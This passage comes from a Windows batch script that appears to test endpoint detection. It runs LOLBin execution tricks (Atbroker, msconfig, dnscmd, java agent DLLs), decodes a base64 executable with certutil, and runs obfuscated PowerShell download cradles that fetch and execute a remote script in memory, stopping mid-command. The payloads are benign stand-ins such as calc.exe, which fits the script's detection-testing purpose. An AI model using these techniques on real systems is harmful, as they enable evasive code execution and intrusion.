 591 | echo Command Excuted: "C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxDrvInst.exe" driver executeinf calc2.inf 
 592 | 
 593 | timeout 5
 594 | 
 595 | echo %time% %date% [+] Testing InstallHinfSection exec
 596 | start "" cmd /c "C:\Program Files (x86)\Citrix\ICA Client\Drivers64\Usbinst.exe" InstallHinfSection "DefaultInstall 128 calc2.inf"
 597 | echo Execution Finished at %time% %date%
 598 | echo Command Excuted: "C:\Program Files (x86)\Citrix\ICA Client\Drivers64\Usbinst.exe" InstallHinfSection "DefaultInstall 128 calc2.inf"
 599 | 
 600 | timeout 5
 601 | 
 602 | echo %time% %date% [+] Testing Atbroker exec
 603 | start "" cmd /c "C:\Windows\System32\Atbroker.exe C:\windows\system32\calc.exe"
 604 | start "" cmd /c "C:\Windows\SysWOW64\Atbroker.exe C:\windows\system32\calc.exe"
 605 | echo Execution Finished at %time% %date%
 606 | echo Command Excuted: "C:\Windows\System32\Atbroker.exe C:\windows\system32\calc.exe"
 607 | echo Command Excuted: "C:\Windows\SysWOW64\Atbroker.exe C:\windows\system32\calc.exe"
 608 | 
 609 | 
 610 | timeout 5
 611 | 
 612 | echo %time% %date% [+] Testing MSCONFIG exec
 613 | echo ^<?xml version="1.0" ?^> > %windir%\System32\mscfgtlc.xml
 614 | echo ^<MSCONFIGTOOLS^> >> %windir%\System32\mscfgtlc.xml
 615 | echo ^<a NAME="LOLBin" PATH="%windir%\System32\cmd.exe" DEFAULT_OPT="" ADV_OPT="/c calc.exe" HELP="LOLBin MSCONFIGTOOLS"^/^> >> %windir%\System32\mscfgtlc.xml
 616 | echo ^</MSCONFIGTOOLS^> >> %windir%\System32\mscfgtlc.xml
 617 | start "" cmd /c msconfig.exe
 618 | echo Execution Finished at %time% %date%
 619 | echo Command Excuted: msconfig.exe
 620 | 
 621 | 
 622 | 
 623 | timeout 5
 624 | 
 625 | 
 626 | 
 627 | echo %time% %date% [+] Testing DNSCMD DLL exec
 628 | start "" cmd /c dnscmd ops_dc /config /serverlevelplugindll AllTheThings.dll 
 629 | echo Execution Finished at %time% %date%
 630 | echo Command Excuted: dnscmd ops_dc /config /serverlevelplugindll AllTheThings.dll 
 631 | 
 632 | timeout 5
 633 | 
 634 | echo %time% %date% [+] Testing JAVA DLL exec
 635 | start "" cmd /c java.exe -agentpath:AllTheThings.dll 
 636 | start "" cmd /c java.exe -agentlib:AllTheThings.dll 
 637 | echo Execution Finished at %time% %date%
 638 | echo Command Excuted: java.exe -agentpath:AllTheThings.dll 
 639 | echo Command Excuted: java.exe -agentlib:AllTheThings.dll  
 640 | 
 641 | echo %time% %date% [+] Testing JAVA DLL exec
 642 | start "" cmd /c java.exe -agentpath:AllTheThings.dll 
 643 | start "" cmd /c java.exe -agentlib:AllTheThings.dll 
 644 | echo Execution Finished at %time% %date%
 645 | echo Command Excuted: java.exe -agentpath:AllTheThings.dll 
 646 | echo Command Excuted: java.exe -agentlib:AllTheThings.dll  
 647 | 
 648 | timeout 5
 649 | 
 650 | echo %time% %date% [+] Testing WseClientSvc.exe exec
 651 | REM Source taken from https://blog.huntresslabs.com/abusing-trusted-applications-a719219220f?gi=de073115ebbc
 652 | echo -----BEGIN CERTIFICATE----- > pass.b64
 653 | echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pass.b64
 654 | echo AAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v >> pass.b64
 655 | echo dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDADpYUFsAAAAA >> pass.b64
 656 | echo AAAAAOAAAgELAQsAAAQAAAAIAAAAAAAATiMAAAAgAAAAQAAAAABAAAAgAAAAAgAA >> pass.b64
 657 | echo BAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAA >> pass.b64
 658 | echo AAAAABAAAAAAAAAAAAAAAAAjAABLAAAAAEAAANAEAAAAAAAAAAAAAAAAAAAAAAAA >> pass.b64
 659 | echo AGAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pass.b64
 660 | echo AAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA >> pass.b64
 661 | echo VAMAAAAgAAAABAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAANAEAAAAQAAA >> pass.b64
 662 | echo AAYAAAAGAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAADAAA >> pass.b64
 663 | echo AAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAwIwAAAAAAAEgAAAACAAUA >> pass.b64
 664 | echo ZCAAAJwCAAABAAAAAQAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pass.b64
 665 | echo AAAAAAAAAAAAAAAAAAAAAC4AAhaaKAMAAAomKh4CKAQAAAoqQlNKQgEAAQAAAAAA >> pass.b64
 666 | echo DAAAAHY0LjAuMzAzMTkAAAAABQBsAAAAAAEAACN+AABsAQAA0AAAACNTdHJpbmdz >> pass.b64
 667 | echo AAAAADwCAAAIAAAAI1VTAEQCAAAQAAAAI0dVSUQAAABUAgAASAAAACNCbG9iAAAA >> pass.b64
 668 | echo AAAAAAIAAAFHFQAACQAAAAD6JTMAFgAAAQAAAAQAAAACAAAAAgAAAAEAAAAEAAAA >> pass.b64
 669 | echo AgAAAAEAAAACAAAAAAAKAAEAAAAAAAYANAAtAAYAawBLAAYAiwBLAAoAwQCuAAAA >> pass.b64
 670 | echo AAABAAAAAAABAAEAAAAQABMAGwAFAAEAAQBQIAAAAACRADsACgABAFwgAAAAAIYY >> pass.b64
 671 | echo QAAQAAIAAAABAEYAEQBAABQAGQBAABAAIQDJABkACQBAABAALgALAB8ALgATACgA >> pass.b64
 672 | echo BIAAAAAAAAAAAAAAAAAAAAAAqQAAAAQAAAAAAAAAAAAAAAEAJAAAAAAABAAAAAAA >> pass.b64
 673 | echo AAAAAAAAAQAtAAAAAAAAAAA8TW9kdWxlPgBwYXNzLmV4ZQBQcm9ncmFtAHBhc3N0 >> pass.b64
 674 | echo aHJ1AG1zY29ybGliAFN5c3RlbQBPYmplY3QATWFpbgAuY3RvcgBhcmdzAFN5c3Rl >> pass.b64
 675 | echo bS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9u >> pass.b64
 676 | echo c0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBwYXNzAFN5 >> pass.b64
 677 | echo c3RlbS5EaWFnbm9zdGljcwBQcm9jZXNzAFN0YXJ0AAAAAyAAAAAAADKi38C8gvFL >> pass.b64
 678 | echo n9EJCAHas0cACLd6XFYZNOCJBQABAR0OAyAAAQQgAQEIBQABEhEOCAEACAAAAAAA >> pass.b64
 679 | echo HgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQAoIwAAAAAAAAAAAAA+IwAA >> pass.b64
 680 | echo ACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMCMAAAAAAAAAAF9Db3JFeGVNYWluAG1z >> pass.b64
 681 | echo Y29yZWUuZGxsAAAAAAD/JQAgQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pass.b64
 682 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pass.b64
 683 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pass.b64
 684 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pass.b64
 685 | echo AAAAAAAAAAAAAAAAAAACABAAAAAgAACAGAAAADgAAIAAAAAAAAAAAAAAAAAAAAEA >> pass.b64
 686 | echo AQAAAFAAAIAAAAAAAAAAAAAAAAAAAAEAAQAAAGgAAIAAAAAAAAAAAAAAAAAAAAEA >> pass.b64
 687 | echo AAAAAIAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAJAAAACgQAAAPAIAAAAAAAAAAAAA >> pass.b64
 688 | echo 4EIAAOoBAAAAAAAAAAAAADwCNAAAAFYAUwBfAFYARQBSAFMASQBPAE4AXwBJAE4A >> pass.b64
 689 | echo RgBPAAAAAAC9BO/+AAABAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAQAAAABAAAA >> pass.b64
 690 | echo AAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQA >> pass.b64
 691 | echo AABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsAScAQAAAQBTAHQAcgBpAG4A >> pass.b64
 692 | echo ZwBGAGkAbABlAEkAbgBmAG8AAAB4AQAAAQAwADAAMAAwADAANABiADAAAAAsAAIA >> pass.b64
 693 | echo AQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAAIAAAADAACAABAEYA >> pass.b64
 694 | echo aQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAAMAAuADAALgAwAC4AMAAAADQACQABAEkA >> pass.b64
 695 | echo bgB0AGUAcgBuAGEAbABOAGEAbQBlAAAAcABhAHMAcwAuAGUAeABlAAAAAAAoAAIA >> pass.b64
 696 | echo AQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAAAgAAAAPAAJAAEATwByAGkA >> pass.b64
 697 | echo ZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAHAAYQBzAHMALgBlAHgAZQAAAAAA >> pass.b64
 698 | echo NAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4A >> pass.b64
 699 | echo MAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4A >> pass.b64
 700 | echo MAAuADAALgAwAAAAAAAAAO+7vzw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9 >> pass.b64
 701 | echo IlVURi04IiBzdGFuZGFsb25lPSJ5ZXMiPz4NCjxhc3NlbWJseSB4bWxucz0idXJu >> pass.b64
 702 | echo OnNjaGVtYXMtbWljcm9zb2Z0LWNvbTphc20udjEiIG1hbmlmZXN0VmVyc2lvbj0i >> pass.b64
 703 | echo MS4wIj4NCiAgPGFzc2VtYmx5SWRlbnRpdHkgdmVyc2lvbj0iMS4wLjAuMCIgbmFt >> pass.b64
 704 | echo ZT0iTXlBcHBsaWNhdGlvbi5hcHAiLz4NCiAgPHRydXN0SW5mbyB4bWxucz0idXJu >> pass.b64
 705 | echo OnNjaGVtYXMtbWljcm9zb2Z0LWNvbTphc20udjIiPg0KICAgIDxzZWN1cml0eT4N >> pass.b64
 706 | echo CiAgICAgIDxyZXF1ZXN0ZWRQcml2aWxlZ2VzIHhtbG5zPSJ1cm46c2NoZW1hcy1t >> pass.b64
 707 | echo aWNyb3NvZnQtY29tOmFzbS52MyI+DQogICAgICAgIDxyZXF1ZXN0ZWRFeGVjdXRp >> pass.b64
 708 | echo b25MZXZlbCBsZXZlbD0iYXNJbnZva2VyIiB1aUFjY2Vzcz0iZmFsc2UiLz4NCiAg >> pass.b64
 709 | echo ICAgIDwvcmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICA8L3NlY3VyaXR5Pg0KICA8 >> pass.b64
 710 | echo L3RydXN0SW5mbz4NCjwvYXNzZW1ibHk+DQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pass.b64
 711 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pass.b64
 712 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pass.b64
 713 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pass.b64
 714 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pass.b64
 715 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pass.b64
 716 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pass.b64
 717 | echo ACAAAAwAAABQMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pass.b64
 718 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pass.b64
 719 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pass.b64
 720 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pass.b64
 721 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pass.b64
 722 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pass.b64
 723 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pass.b64
 724 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pass.b64
 725 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pass.b64
 726 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pass.b64
 727 | echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= >> pass.b64
 728 | echo -----END CERTIFICATE----- >> pass.b64
 729 | start "" cmd /c certutil -f -decode pass.b64 pass_TestBin.exe >nul
 730 | start "" cmd /c WseClientSvc.exe pass_TestBin.exe calc.exe
 731 | echo Execution Finished at %time% %date%
 732 | echo Command Excuted: certutil -f -decode pass.b64 pass_TestBin.exe 
 733 | echo Command Excuted: WseClientSvc.exe pass_TestBin.exe calc.exe 
 734 | 
 735 | timeout 5
 736 | 
 737 | 
 738 | REM ---- EOF LOLBAS Payloads ----
 739 | 
 740 | echo **********************************************
 741 | echo *        Testing Custom PAYLOADS             *
 742 | echo **********************************************
 743 | 
 744 | 
 745 | echo %time% %date% [+] Testing winnt32 exec
 746 | start "" cmd /c winnt32 /cmd:calc.exe
 747 | echo Execution Finished at %time% %date%
 748 | echo Command Excuted: winnt32 /cmd:calc.exe
 749 | 
 750 | timeout 5
 751 | 
 752 | echo %time% %date% [+] Testing winrs exec
 753 | start "" cmd /c winrs -r:http://127.0.0.1 calc.exe
 754 | echo Execution Finished at %time% %date%
 755 | echo Command Excuted: winrs -r:http://127.0.0.1 calc.exe
 756 | 
 757 | timeout 5
 758 | 
 759 | REM Example: https://twitter.com/subtee/status/872244674609676288
 760 | echo %time% %date% [+] Testing waitfor exec
 761 | start "" cmd /c waitfor SDX & calc.exe
 762 | timeout 3
 763 | start "" cmd /c waitfor /s 127.0.0.1 /si SDX
 764 | echo Execution Finished at %time% %date%
 765 | echo Command Excuted: waitfor SDX & calc.exe
 766 | echo Command Excuted: waitfor /s 127.0.0.1 /si SDX
 767 | 
 768 | echo %time% %date% [+] Testing .SettingContent-ms extension exec
 769 | echo ^<?xml version="1.0" encoding="UTF-8"?^> > Test.SettingContent-ms
 770 | echo  ^<PCSettings^> >> Test.SettingContent-ms
 771 | echo    ^<SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent"^> >> Test.SettingContent-ms
 772 | echo      ^<ApplicationInformation^> >> Test.SettingContent-ms
 773 | echo        ^<AppID^> windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel^</AppID^> >> Test.SettingContent-ms
 774 | echo        ^<DeepLink^> %windir%\system32\calc.exe^</DeepLink^> >> Test.SettingContent-ms
 775 | echo        ^<Icon^> %windir%\system32\control.exe^</Icon^> >> Test.SettingContent-ms
 776 | echo      ^</ApplicationInformation^> >> Test.SettingContent-ms
 777 | echo      ^<SettingIdentity^> >> Test.SettingContent-ms
 778 | echo      ^<PageID^> ^</PageID^> >> Test.SettingContent-ms
 779 | echo        ^<HostID^> {12B1697E-D3A0-4DBC-B568-CCF64A3F934D}^</HostID^> >> Test.SettingContent-ms
 780 | echo      ^</SettingIdentity^> >> Test.SettingContent-ms
 781 | echo      ^<SettingInformation^> >> Test.SettingContent-ms
 782 | echo        ^<Description^> @shell32.dll,-4161^</Description^> >> Test.SettingContent-ms
 783 | echo        ^<Keywords^> @shell32.dll,-4161^</Keywords^> >> Test.SettingContent-ms
 784 | echo      ^</SettingInformation^> >> Test.SettingContent-ms
 785 | echo    ^</SearchableContent^> >> Test.SettingContent-ms
 786 | echo  ^</PCSettings^> >> Test.SettingContent-ms
 787 | start "" cmd /c Test.SettingContent-ms
 788 | echo Execution Finished at %time% %date%
 789 | echo Command Excuted: Test.SettingContent-ms
 790 | 
 791 | timeout 5
 792 | 
 793 | 
 794 | REM ---- EOF Custom Payloads ----
 795 | 
 796 | echo **********************************************
 797 | echo *    Testing Invoke-CradleCrafter PAYLOADS   *
 798 | echo **********************************************
 799 | 
 800 | REM Payloads in this section were generated using https://github.com/danielbohannon/Invoke-CradleCrafter.
 801 | 
 802 | echo %time% %date% [+] Testing MEMORY\PSWEBSTRING exec
 803 | start "" cmd /c powershell -c "Set-Item Variable:\FW 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';dir ect*;SI Variable:/d (.(LS Variable:/E*tex*).Value.(((LS Variable:/E*tex*).Value|Get-Member)[6].Name).(((LS Variable:/E*tex*).Value.(((LS Variable:/E*tex*).Value|Get-Member)[6].Name).PsObject.Methods|Where{(ChildItem Variable:/_).Value.Name-ilike'*Co*d'}).Name).Invoke((LS Variable:/E*tex*).Value.(((LS Variable:/E*tex*).Value|Get-Member)[6].Name).(((LS Variable:/E*tex*).Value.(((LS Variable:/E*tex*).Value|Get-Member)[6].Name)|Get-Member|Where{(ChildItem Variable:/_).Value.Name-ilike'*man*Name'}).Name).Invoke('*w-*ct',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(LS Variable:/E*tex*).Value.(((LS Variable:/E*tex*).Value|Get-Member)[6].Name).(((LS Variable:/E*tex*).Value.(((LS Variable:/E*tex*).Value|Get-Member)[6].Name)|Get-Member|Where{(ChildItem Variable:/_).Value.Name-ilike'I*t'}).Name).Invoke((Variable d -Va).((((Variable d -Va)|Get-Member)|Where{(ChildItem Variable:/_).Value.Name-ilike'*wn*g'}).Name).Invoke((Get-Item Variable:/FW).Value))" 
 804 | echo Execution Finished at %time% %date%
 805 | timeout 5
 806 | 
 807 | echo %time% %date% [+] Testing MEMORY\PSWEBDATA exec
 808 | start "" cmd /c powershell -c "dir ect*;SV j8 (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Member|?{$_.Name-like'*nd*e'}).Name).Invoke('Ne*ct',$TRUE,$TRUE))Net.WebClient);Set-Variable z 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';[ScriptBlock]::Create(([String]::Join('',(((Get-Variable j8 -ValueOn).((((Get-Variable j8 -ValueOn)|Member)|?{$_.Name-like'D*a'}).Name).Invoke((Variable z -ValueOnl))|%{$_-As'Char'}))))).Invoke()" 
 809 | echo Execution Finished at %time% %date%
 810 | timeout 5
 811 | 
 812 | echo %time% %date% [+] Testing MEMORY\PSWEBOPENREAD exec
 813 | start "" cmd /c powershell -c "$wr=(New-Object Net.WebClient);$url='https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';$sr=New-Object IO.StreamReader($wr.OpenRead($url));$res=$sr.ReadToEnd();$sr.Close();$res" 
 814 | echo Execution Finished at %time% %date%
 815 | timeout 5
 816 | 
 817 | echo %time% %date% [+] Testing MEMORY\NETWEBSTRING exec
 818 | start "" cmd /c powershell -c "([System.Net.WebClient]::New().DownloadString('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt'))" 
 819 | echo Execution Finished at %time% %date%
 820 | 
 821 | timeout 5
 822 | 
 823 | echo %time% %date% [+] Testing MEMORY\NETWEBDATA exec
 824 | start "" cmd /c powershell -c "Set-Variable Q 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';SI Variable:/V0r ([Net.WebClient]::New());SV MAI (((((GV V0r).Value|Member)|?{(ChildItem Variable:/_).Value.Name-like'*wn*a'}).Name));&([ScriptBlock]::Create(([System.String]::Join('',(((GV V0r).Value.((GI Variable:\MAI).Value)((GV Q).Value)|ForEach{(GI Variable:\_).Value-As'Char'}))))))" 
 825 | echo Execution Finished at %time% %date%
 826 | timeout 5
 827 | 
 828 | echo %time% %date% [+] Testing MEMORY\NETWEBOPENREAD exec
 829 | start "" cmd /c powershell -c "Set-Variable RsL ([Net.WebClient]::New());SV 7SW 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';Set-Variable RsL (LS Variable:RsL).Value.((((LS Variable:RsL).Value|Member)|Where-Object{(Variable _).Value.Name-ilike'*ad'}).Name)((Variable 7SW -Va));Set-Variable UR '';Try{While((Get-Item Variable:UR).Value+=[Char](LS Variable:RsL).Value.ReadByte()){}}Catch{};[ScriptBlock]::Create((Get-Item Variable:UR).Value).InvokeReturnAsIs()" 
 830 | echo Execution Finished at %time% %date%
 831 | timeout 5
 832 | 
 833 | echo %time% %date% [+] Testing MEMORY\PSWEBREQUEST exec
 834 | start "" cmd /c powershell -c "Set-Item Variable:/c 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';[ScriptBlock]::Create((((Get-Item Variable:c).Value|ForEach-Object{(.(Get-Variable E*tex*).Value.InvokeCommand.(((Get-Variable E*tex*).Value.InvokeCommand|Get-Member|Where{$_.Name-clike'*t*a*d'}).Name)((Get-Variable E*tex*).Value.InvokeCommand.(((Get-Variable E*tex*).Value.InvokeCommand.PsObject.Methods|Where{$_.Name-clike'*nd*e'}).Name)('In*k*t',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet) $_)})|ForEach-Object{$_.(($_|Get-Member)[4].Name).Invoke()})).Invoke()" 
 835 | echo Execution Finished at %time% %date%
 836 | timeout 5
 837 | 
 838 | echo %time% %date% [+] Testing MEMORY\PSRESTMETHOD exec
 839 | start "" cmd /c powershell -c "SI Variable:50a 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';Set-Variable Z ((Get-ChildItem Variable:50a).Value|ForEach-Object{(.$ExecutionContext.(($ExecutionContext|GM)[6].Name).GetCommand($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(Variable _ -Va).Name-like'*man*Name'}).Name)('*-Re*d',1,1),[Management.Automation.CommandTypes]::Cmdlet) (Variable _ -Va))});IEX (GV Z -ValueO)" 
 840 | echo Execution Finished at %time% %date% 
 841 | timeout 5
 842 | 
 843 | echo %time% %date% [+] Testing MEMORY\NETWEBREQUEST exec
 844 | start "" cmd /c powershell -c "SI Variable:\UB ([Net.HttpWebRequest]::Create('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt').GetResponse().GetResponseStream());Set-Variable AZe '';Try{While((Variable AZe).Value+=[Char](Variable UB).Value.ReadByte()){}}Catch{};[ScriptBlock]::Create((Variable AZe).Value).Invoke()" 
 845 | echo Execution Finished at %time% %date%
 846 | timeout 5
 847 | 
 848 | echo %time% %date% [+] Testing MEMORY\PSSENDKEYS execs
 849 | start "" cmd /c powershell -c "ls _-*;Set-Item Variable:/O (&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*m*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'G*om*e'}).Name).Invoke('N*-O*',1,1))-ComObj WScript.Shell);Set-Item Variable:/l 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';Set-Variable fN 'HKCU:\Software\Microsoft\Notepad';SI Variable:\76 'Notepad';$Null=[System.Reflection.Assembly]::([System.Reflection.Assembly].GetMethods()|Where-Object{$_.Name-like'L*ame'}|ForEach{(LS Variable:\_).Value.Name}|Select  -Firs 1).Invoke('System.Windows.Forms');Set-Variable 5M (&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('G*em*y')(Item Variable:\fN).Value);@(@(((&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('G*em*y')HKCU:\Software\Microsoft\Notepad|Get-Member)[14].Name),0),@(((&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('G*em*y')HKCU:\Software\Microsoft\Notepad|Get-Member)[8].Name),([String]([Windows.Forms.Screen]::AllScreens)).Split('=')[5].Split('}')[0]))|ForEach{&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('S*-Ite*y')(Item Variable:\fN).Value $_[0] (LS Variable:\_).Value[1]};SV yda (Get-Variable O -Val).(((Get-Variable O -Val)|Get-Member)[2].Name).Invoke((Item Variable:76).Value).ProcessID;SI Variable:\J $Null;While(!((Get-Variable J).Value)){SI Variable:\J (Process|Where-Object{$_.id-ceq(ChildItem Variable:yda).Value}|ForEach{(LS Variable:\_).Value.MainWindowTitle});&($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*m*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'G*om*e'}).Name).Invoke('*t-Sl*',1,$TRUE)))-Milli 500};While(!(Get-Variable O -Val).(((Get-Variable O -Val)|Get-Member)[0].Name).Invoke((Get-Variable J).Value)){&($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*m*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'G*om*e'}).Name).Invoke('*t-Sl*',1,$TRUE)))-Milli 500};(Get-Variable O -Val).(((Get-Variable O -Val)|Get-Member)[10].Name).Invoke('^o');&($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*m*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'G*om*e'}).Name).Invoke('*t-Sl*',1,$TRUE)))-Milli 500;@((Get-Variable l -ValueOnl),(' '*1000),'~')|ForEach{(Get-Variable O -Val).(((Get-Variable O -Val)|Get-Member)[10].Name).Invoke((LS Variable:\_).Value)};SI Variable:q $Null;While((Item Variable:\q).Value.Length -lt 2){[System.Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{(Get-Variable O -Val).(((Get-Variable O -Val)|Get-Member)[10].Name).Invoke($_)};&($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*m*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'G*om*e'}).Name).Invoke('*t-Sl*',1,$TRUE)))-Milli 500;SI Variable:q ([System.Windows.Forms.Clipboard]::([System.Windows.Forms.Clipboard].GetMethods()[16].Name).Invoke())};[System.Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{(Get-Variable O -Val).(((Get-Variable O -Val)|Get-Member)[10].Name).Invoke((LS Variable:\_).Value)};If(Process|Where-Object{$_.id-ceq(ChildItem Variable:yda).Value}){@('{TAB}','~')|ForEach{(Get-Variable O -Val).(((Get-Variable O 